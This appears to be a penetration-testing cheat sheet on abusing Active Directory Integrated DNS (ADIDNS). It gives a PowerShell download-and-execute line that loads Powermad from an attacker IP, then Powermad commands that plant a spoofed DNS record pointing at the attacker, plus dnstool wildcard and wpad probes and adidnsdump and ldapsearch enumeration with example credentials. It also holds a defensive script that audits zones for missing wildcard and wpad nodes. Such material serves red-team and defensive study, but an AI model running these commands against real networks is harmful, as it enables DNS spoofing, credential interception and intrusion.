# ADIDNS Abuse

0\. Load tools:

```
PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1")
```

1\. Check if you are able to modify (add) AD DNS names:

```
PS > Get-ADIDNSZone -Credential $cred -Verbose
DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local
DC=_msdcs.megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=megacorp,DC=local

PS > Get-ADIDNSPermission -Credential $cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}
Principal             : NT AUTHORITY\Authenticated Users
IdentityReference     : S-1-5-11
ActiveDirectoryRights : CreateChild
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
```

This `CreateChild` permission is what we need.

2\. Create and configure a new DNS node that is likely to be exploited for spoofing, point it at the attacker's IP and enable it. I chose `pc01`, which was found in the DNS cache:

```
PS > New-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
PS > $dnsRecord = New-DNSRecordArray -Type A -Data 10.10.13.37
PS > Set-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Value $dnsRecord -Credential $cred -Verbose
PS > Enable-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
```

3\. Check the newly created DNS object and try to resolve it. AD will need some time (\~180 seconds) to sync the LDAP changes into DNS:

```
PS > Get-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Credential $cred -Verbose
PS > Resolve-DNSName pc01
PS > cmd /c ping -n 1 pc01
```

4\. Clean up:

```
PS > Remove-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
```

## ADIDNS Poisoning (Wildcard Injection)

* <https://blog.netspi.com/exploiting-adidns/>
* <https://blog.netspi.com/adidns-revisited/>
* <https://www.gosecure.net/blog/2019/02/20/abusing-unsafe-defaults-in-active-directory/>

Check if we can perform the attack:

```
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r '*' --action query DC01.megacorp.local
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r 'wpad' --action query DC01.megacorp.local
```

## Tools

### adidnsdump

* <https://github.com/dirkjanm/adidnsdump>

```
$ adidnsdump -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.megacorp.local -r [--dcfilter]
$ mv records.csv ~/ws/enum/adidns.csv
```

Check with ldapsearch:

```
$ ldapsearch -H ldap://10.10.13.37:389 -x -D 'CN=snovvcrash,CN=Users,DC=megacorp,DC=local' -w 'Passw0rd!' -s sub -b 'DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local' '(objectClass=*)' dnsRecord dNSTombstoned name
```
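The wildcard and `wpad` queries above and the raw `ldapsearch` dump both end up at the same data: the binary `dnsRecord` attribute of each node under `CN=MicrosoftDNS`, which `ldapsearch` prints base64-encoded. The script below is an added example (not code from adidnsdump, krbrelayx or Powermad) that decodes that attribute following the MS-DNSP `DNS_RPC_RECORD` layout and then audits one zone for the two conditions the checks above look for: the `*` and `wpad` nodes being absent while Authenticated Users hold `CreateChild` on the zone, or being present and needing review. All blobs are constructed in the code; the `authenticated_users_create_child` flag stands in for the result of the `Get-ADIDNSPermission` check from step 1.

```python
#!/usr/bin/env python3
"""
Decode the binary dnsRecord values that ldapsearch prints ("dnsRecord:: <base64>")
from CN=MicrosoftDNS and audit one zone for the nodes the wildcard check asks about.
Added example, not code from adidnsdump, krbrelayx or Powermad. The record layout
follows MS-DNSP DNS_RPC_RECORD; every blob below is constructed for the demo.
"""
import base64
import ipaddress
import struct

# Record types this example decodes (MS-DNSP DNS_RECORD_TYPE values)
DNS_TYPE_ZERO, DNS_TYPE_A, DNS_TYPE_NS, DNS_TYPE_CNAME, DNS_TYPE_PTR, DNS_TYPE_AAAA = 0, 1, 2, 5, 12, 28
TYPE_NAMES = {0: "TOMBSTONE", 1: "A", 2: "NS", 5: "CNAME", 12: "PTR", 28: "AAAA"}
HEADER_LEN = 24  # wDataLength .. dwTimeStamp

def _count_name(data: bytes) -> str:
    """Decode DNS_COUNT_NAME: Length, LabelCount, then length-prefixed labels ending in 0x00."""
    label_count, pos, labels = data[1], 2, []
    for _ in range(label_count):
        n = data[pos]
        labels.append(data[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    return ".".join(labels) + "."

def parse_dns_record(blob: bytes) -> dict:
    """Parse one DNS_RPC_RECORD value into header fields plus decoded data."""
    if len(blob) < HEADER_LEN:
        raise ValueError("dnsRecord shorter than the 24-byte header")
    # wDataLength, wType, Version, Rank, wFlags, dwSerial are little-endian ...
    data_len, rtype, version, rank, _flags, serial = struct.unpack_from("<HHBBHI", blob, 0)
    # ... but dwTtlSeconds is stored in network byte order
    (ttl,) = struct.unpack_from(">I", blob, 12)
    _reserved, timestamp = struct.unpack_from("<II", blob, 16)
    data = blob[HEADER_LEN:HEADER_LEN + data_len]
    if version != 5 or len(data) != data_len:
        raise ValueError("malformed dnsRecord (bad version or truncated data)")
    if rtype == DNS_TYPE_A:
        value = str(ipaddress.IPv4Address(data))
    elif rtype == DNS_TYPE_AAAA:
        value = str(ipaddress.IPv6Address(data))
    elif rtype in (DNS_TYPE_NS, DNS_TYPE_CNAME, DNS_TYPE_PTR):
        value = _count_name(data)
    elif rtype == DNS_TYPE_ZERO:
        value = "(tombstoned)"  # data holds the EntombedTime FILETIME
    else:
        value = data.hex()
    return {
        "type": TYPE_NAMES.get(rtype, f"TYPE{rtype}"),
        "ttl": ttl,
        "rank": rank,
        "serial": serial,
        "static": timestamp == 0,  # dwTimeStamp is hours since 1601; 0 marks a static record
        "value": value,
    }

def parse_ldapsearch_line(line: str) -> dict:
    """ldapsearch emits binary attributes as 'dnsRecord:: <base64>'; decode and parse one."""
    attr, _, b64 = line.partition(":: ")
    if attr.strip() != "dnsRecord":
        raise ValueError("not a base64 dnsRecord line")
    return parse_dns_record(base64.b64decode(b64.strip()))

def build_record(rtype: int, data: bytes, ttl: int = 180, serial: int = 1, timestamp: int = 0) -> bytes:
    """Encode a DNS_RPC_RECORD; used here only to construct sample values (Rank 0xF0 = RANK_ZONE)."""
    header = struct.pack("<HHBBHI", len(data), rtype, 5, 0xF0, 0, serial)
    return header + struct.pack(">I", ttl) + struct.pack("<II", 0, timestamp) + data

def audit_zone(nodes: dict, authenticated_users_create_child: bool) -> list:
    """
    nodes: node name -> list of dnsRecord blobs for one zone (as dumped above).
    authenticated_users_create_child: result of the Get-ADIDNSPermission check
    (CreateChild for NT AUTHORITY\\Authenticated Users on the zone).
    Returns findings for the '*' and 'wpad' names that the dnstool queries above probe.
    """
    findings = []
    for name in ("*", "wpad"):
        if name not in nodes:
            if authenticated_users_create_child:
                findings.append(f"'{name}' is absent and any authenticated user can create it")
            continue
        for rec in (parse_dns_record(b) for b in nodes[name]):
            findings.append(f"'{name}' exists as {rec['type']} {rec['value']}; confirm it is intentional")
    return findings

if __name__ == "__main__":
    # Constructed zone dump: only pc01 exists, pointing at the address used in the notes above
    zone = {"pc01": [build_record(DNS_TYPE_A, bytes([10, 10, 13, 37]))]}
    for line in audit_zone(zone, authenticated_users_create_child=True):
        print(line)
```

A tombstoned `*` or `wpad` node (record type 0, `dNSTombstoned` set) is reported just like a live one so it gets looked at: the node object still exists in LDAP even though the name no longer resolves. Pre-creating both names with a harmless value, or removing `CreateChild` for Authenticated Users on the zone, clears the "absent" finding.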

If you need to dump the ADIDNS of a child domain (say `child.megacorp.local`), use the `--zone` and `--forest` options:

```
# Will dump records from DC=megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local --zone megacorp.local --forest -r

# Will attempt to dump records from DC=child.megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=child,DC=megacorp,DC=local (and may fail)
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local -r
```

Merge all the IPs into `/24` CIDRs with a Python script:

{% code title="cidr\_merge.py" %}

```python
#!/usr/bin/env python3

"""
Merge standalone IPs into CIDRs.

Example:
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' > ip.lst
$ cidr_merge.py | sort -u -t'.' -k1,1n -k2,2n -k3,3n -k4,4n | grep -e '^192' -e '^172' -e '^10'
"""

import netaddr

iplst = []
with open('ip.lst', 'r') as fd:
    for line in fd:
        ip = line.rstrip('\n')
        try:
            # Widen every address to its /24 so that neighbouring hosts collapse into one network
            iplst.append(netaddr.IPNetwork(f'{ip}/24'))
        except netaddr.core.AddrFormatError:
            # Skip non-IP values (CSV header, hostnames from CNAME/NS records, empty lines)
            pass

# cidr_merge() also collapses adjacent /24s into larger supernets where possible
for net in netaddr.cidr_merge(iplst):
    print(str(net))
```

{% endcode %}

Or using [mapcidr](https://github.com/projectdiscovery/mapcidr):

```
$ eget -qs linux/amd64 "projectdiscovery/mapcidr" --to mapcidr
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' | egrep '^[0-9]' | ./mapcidr -aa -silent | ./mapcidr -s -silent

$ cme ldap 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -M get-network -o ALL=true
```

### DnsServer

Dump ADIDNS using PowerShell and `DnsServer` module:

```
PS > Import-Module DnsServer
PS > Get-DnsServerZone -ComputerName DC01 | % {Get-DnsServerResourceRecord -ComputerName DC01 -ZoneName $_.ZoneName -RRType A} | ft -Wrap -AutoSize | tee adidns.txt
```

